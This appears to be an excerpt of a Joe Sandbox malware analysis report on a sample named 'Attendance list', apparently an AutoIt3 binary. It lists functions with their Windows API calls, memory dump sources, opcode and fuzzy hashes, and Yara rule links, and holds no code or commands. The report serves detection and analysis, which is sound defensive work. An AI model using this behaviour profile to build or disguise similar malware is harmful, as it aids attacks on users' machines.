                        • Instruction ID: 0814c5a1edbd73a85a345297a4d78073e5186914bb47791f5acebe16540da9a7
                        • Opcode Fuzzy Hash: e9b5a71b892bf0c5d9c1ade40899f3cd0abb15ea7ebdd909eef411d1380c601d
                        • Instruction Fuzzy Hash: 73F0E23601925AFBDF226F54AC0DFCE3F58AF06310F044000FA11650E287B55550EFE5
                        Function 0091A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091A399
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0091A3AC
                        • GetCurrentThreadId.KERNEL32 ref: 0091A3B3
                        • AttachThreadInput.USER32(00000000), ref: 0091A3BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: 571bae2e02d0dd2594e88d2e22ca79ed23c25276e449015c87a1c19a45141206
                        • Instruction ID: 0d6ad68fbd6e457dcafb449e8b62485b0ca1ef9f519afd890998576e4f9504c1
                        • Opcode Fuzzy Hash: 571bae2e02d0dd2594e88d2e22ca79ed23c25276e449015c87a1c19a45141206
                        • Instruction Fuzzy Hash: DFE0393124A22CBAEB211BA2DC0CFD77F5CEF167A1F008025F919C4060C6758981EBA0
                        Function 008C2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000008), ref: 008C2231
                        • SetTextColor.GDI32(?,000000FF), ref: 008C223B
                        • SetBkMode.GDI32(?,00000001), ref: 008C2250
                        • GetStockObject.GDI32(00000005), ref: 008C2258
                        • GetWindowDC.USER32(?,00000000), ref: 008FC0D3
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 008FC0E0
                        • GetPixel.GDI32(00000000,?,00000000), ref: 008FC0F9
                        • GetPixel.GDI32(00000000,00000000,?), ref: 008FC112
                        • GetPixel.GDI32(00000000,?,?), ref: 008FC132
                        • ReleaseDC.USER32(?,00000000), ref: 008FC13D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                        • String ID:
                        • API String ID: 1946975507-0
                        • Opcode ID: 526f06e41d5211325140746d044cd03355ce042aa3d688ddfaa6541c935c2e3f
                        • Instruction ID: 4305d4eda2c20ea5856ab0cf371c7931621e8a5c81eb467adf6d2088872d670e
                        • Opcode Fuzzy Hash: 526f06e41d5211325140746d044cd03355ce042aa3d688ddfaa6541c935c2e3f
                        • Instruction Fuzzy Hash: F9E06536518149EADF215F74FC0DBE87B10EB0A336F008366FB69980E187714590EB11
                        Function 00918C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 00918C63
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,0091882E), ref: 00918C6A
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0091882E), ref: 00918C77
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,0091882E), ref: 00918C7E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: 218b65b902ca20a4ca343aec0cd59bafd72c8795331d17cf70cb6dfe630783a6
                        • Instruction ID: 0180c93a6ac381845dfb0505dfd1e68f2c0c15f62d6d4004d2e6a3ce90b45442
                        • Opcode Fuzzy Hash: 218b65b902ca20a4ca343aec0cd59bafd72c8795331d17cf70cb6dfe630783a6
                        • Instruction Fuzzy Hash: 66E0863A756212DBD7205FB46D0CF973BACEF52792F044828B285D9040DA348486EB61
                        Function 00902187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 00902187
                        • GetDC.USER32(00000000), ref: 00902191
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009021B1
                        • ReleaseDC.USER32(?), ref: 009021D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: adf8d0dd3bc4e573171f5d71740665b7bd045c7c2db4d018097267ded7c5fa1f
                        • Instruction ID: c89cbbe5cbc0254ed5828c1a89f36ca2ec9e4fc5cb31e6a0d56a400359fd2939
                        • Opcode Fuzzy Hash: adf8d0dd3bc4e573171f5d71740665b7bd045c7c2db4d018097267ded7c5fa1f
                        • Instruction Fuzzy Hash: 04E0E579814619EFDF01AF64D818E9E7BB1FB4D350F128429FD5AD7260CB388141AF40
                        Function 0090219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 0090219B
                        • GetDC.USER32(00000000), ref: 009021A5
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009021B1
                        • ReleaseDC.USER32(?), ref: 009021D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 683c2bee33a384af2e0fc1e5c75e89623897472e766f5d3ee9d1a7b11e162c4e
                        • Instruction ID: d7482582d0d8052d7107e1ecb459f5a66f984dc6840c709bf99a241f7a41abd1
                        • Opcode Fuzzy Hash: 683c2bee33a384af2e0fc1e5c75e89623897472e766f5d3ee9d1a7b11e162c4e
                        • Instruction Fuzzy Hash: 60E0E579814209AFCF11AF64C818A9E7BB1FB4D310F128029F95AD7220CB389141AF40
                        Function 0091B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                        Download Yara Rule
                        APIs
                        • OleSetContainedObject.OLE32(?,00000001), ref: 0091B981
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ContainedObject
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3565006973-3941886329
                        • Opcode ID: c648428e0b0d9b365d9c1ebdd4bcc87a6ab8e35149c51be95c85affc3b9433ba
                        • Instruction ID: 7120ca765d16687b25af0b53f9ea76633756dcccad3f5170abbf5337b2d52beb
                        • Opcode Fuzzy Hash: c648428e0b0d9b365d9c1ebdd4bcc87a6ab8e35149c51be95c85affc3b9433ba
                        • Instruction Fuzzy Hash: A0914B716006059FDB24CF28C885BAAB7F9FF49714F14856DF94ACB291DB70E881CB50
                        Function 0092B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • __wcsnicmp.LIBCMT ref: 0092B298
                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0092B361
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                        • String ID: LPT
                        • API String ID: 3222508074-1350329615
                        • Opcode ID: bf2242a26eb4259a8f75acd686368066017d00ffb689686a3cb134e543113494
                        • Instruction ID: e4df08d752fd39e79920ef8214db217fb6f41d1193c1833ceb0956a702281338
                        • Opcode Fuzzy Hash: bf2242a26eb4259a8f75acd686368066017d00ffb689686a3cb134e543113494
                        • Instruction Fuzzy Hash: 20619275A00225EFCB14EF58D885EAEB7F8FF08710F11445AF556AB251DB70AE40CB51
                        Function 008D2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 008D2AC8
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 008D2AE1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 5159e064683746ea0352ced12a83f900c422f7614a7954054b275d0543e6ce97
                        • Instruction ID: 06a048b3384f76e9f9f82ba0399016f503f578476e16516a4d14ea86b5298556
                        • Opcode Fuzzy Hash: 5159e064683746ea0352ced12a83f900c422f7614a7954054b275d0543e6ce97
                        • Instruction Fuzzy Hash: 93513771418B449BD320AF55D88AFAFBBF8FB84310F42889DF1D9811A1DB708529CB27
                        Function 009299BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C506B: __fread_nolock.LIBCMT ref: 008C5089
                        • _wcscmp.LIBCMT ref: 00929AAE
                        • _wcscmp.LIBCMT ref: 00929AC1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcscmp$__fread_nolock
                        • String ID: FILE
                        • API String ID: 4029003684-3121273764
                        • Opcode ID: c487ffba82e9dd516ea1774689678c537538da61c2c8094904129f42d2adcf00
                        • Instruction ID: 33b53ac2baed4f1df70157a1c33a7ac03bd77a9b8ddfc7fedb721618b4a3b368
                        • Opcode Fuzzy Hash: c487ffba82e9dd516ea1774689678c537538da61c2c8094904129f42d2adcf00
                        • Instruction Fuzzy Hash: A8410671A00619BADF20EAA4DC45FEFBBBDEF45714F000079F900E7185DA75AA4487A2
                        Function 00932882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00932892
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009328C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CrackInternet_memset
                        • String ID: |
                        • API String ID: 1413715105-2343686810
                        • Opcode ID: 72e9887e3b4caac3f20b559af33b9a8b8ec8b3d9a16551754cf9cd38d6b6630f
                        • Instruction ID: 57fc418d36ca46c95a6e171ecd2fd0219a9af2b2e42b408f73a5e371a10e0d20
                        • Opcode Fuzzy Hash: 72e9887e3b4caac3f20b559af33b9a8b8ec8b3d9a16551754cf9cd38d6b6630f
                        • Instruction Fuzzy Hash: F1310771800119AFCF01AFA5CC85EEEBFB9FF09310F104069F915A6166DA319A56DFA1
                        Function 00946CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 00946D86
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00946DC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: a6046c7c0765a5d222c133aa5d8dadc1581babc18e1bd3353227f18312c8389a
                        • Instruction ID: c0392ad88fe4f6544f0b20235c05a90ffdb354ea50a30fdfb7297915f14b15b2
                        • Opcode Fuzzy Hash: a6046c7c0765a5d222c133aa5d8dadc1581babc18e1bd3353227f18312c8389a
                        • Instruction Fuzzy Hash: E6318F71610604AEEB109F28CC80FFB73BCFF89724F108619F9A597190DA31AC51DB61
                        Function 00922D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00922E00
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00922E3B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: f50fb88f8ffe13b111caa0e3a6f48348ab6473c1a4f9e29c61bffd80f9b20ffd
                        • Instruction ID: 5f868abd1876c410eb13a554bd260123ddbb74a4c71c60fb5f1db112884b2b52
                        • Opcode Fuzzy Hash: f50fb88f8ffe13b111caa0e3a6f48348ab6473c1a4f9e29c61bffd80f9b20ffd
                        • Instruction Fuzzy Hash: BE310631604325BBEB24CF48E845BEEBBBDFF05300F150429E985DB1A4D7709940EB51
                        Function 00946943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009469D0
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009469DB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: 9612d74f11d9b7a55f9379ea2cc2b1aa6e18493cd115e56ed57dc9b7a40ec00b
                        • Instruction ID: e4394bde58bef3bf57e298cb9c28724d5661b00f56abd3e2a6c45adc5b62a55f
                        • Opcode Fuzzy Hash: 9612d74f11d9b7a55f9379ea2cc2b1aa6e18493cd115e56ed57dc9b7a40ec00b
                        • Instruction Fuzzy Hash: 531104B1310208AFEF158F18CC80FBB376EEB8A3A4F110124F9589B290D6B1DC5087A0
                        Function 00946E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008C1D73
                          • Part of subcall function 008C1D35: GetStockObject.GDI32(00000011), ref: 008C1D87
                          • Part of subcall function 008C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C1D91
                        • GetWindowRect.USER32(00000000,?), ref: 00946EE0
                        • GetSysColor.USER32(00000012), ref: 00946EFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: 06634e09df05135f8d3c2a01e1cbfbc18e636d0d18269bbad9017f7adcc25356
                        • Instruction ID: 2323a7df7bc6e8fd2f991a5a298ba1a38bba3d6102c6a231ecd30c08d2f3cb21
                        • Opcode Fuzzy Hash: 06634e09df05135f8d3c2a01e1cbfbc18e636d0d18269bbad9017f7adcc25356
                        • Instruction Fuzzy Hash: 8721567262020AAFDF04DFA8CC45EFA7BB8FB49314F004628FD55D3250E634E8619B60
                        Function 00946B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 00946C11
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00946C20
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 0e04938e070ffbeac025af9a6709b736980257270cc102e6cda858a5a3f1041c
                        • Instruction ID: e302baaae14cad4903a268f069fb2ce7804f882d6bc96a18950a8b3d999359c6
                        • Opcode Fuzzy Hash: 0e04938e070ffbeac025af9a6709b736980257270cc102e6cda858a5a3f1041c
                        • Instruction Fuzzy Hash: 91119AB1114208ABEB108E64DC91EFA376DEB46368F204728FAA1D71E0C675DC90AB61
                        Function 00922E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00922F11
                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00922F30
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: e8e4ba790176c705b43d437b0a88e90bba745b2fc0f8b467fe7b3e2ffad66c85
                        • Instruction ID: f972d2e5c072fa4d87ae03635779d72bb415063a73418b53666d60b93a0d42aa
                        • Opcode Fuzzy Hash: e8e4ba790176c705b43d437b0a88e90bba745b2fc0f8b467fe7b3e2ffad66c85
                        • Instruction Fuzzy Hash: EF11E232915234BBCB24DF59FD04BE973BDEB02310F0500A1EA44AB2A4D7B0AE08D791
                        Function 009324CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00932520
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00932549
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: 628c8a7c14816f64c5cf407e16198dfe6ab237e5e80043802234a725779a8c74
                        • Instruction ID: 64d3a8d6ed4e2ef20539ad5ea90991b330abd16dddf4c529a0395f2996e2ba68
                        • Opcode Fuzzy Hash: 628c8a7c14816f64c5cf407e16198dfe6ab237e5e80043802234a725779a8c74
                        • Instruction Fuzzy Hash: 5811CEB0601226BADB248F618C99EFBFFACFF06751F10812AF90586040D3746A81DEF0
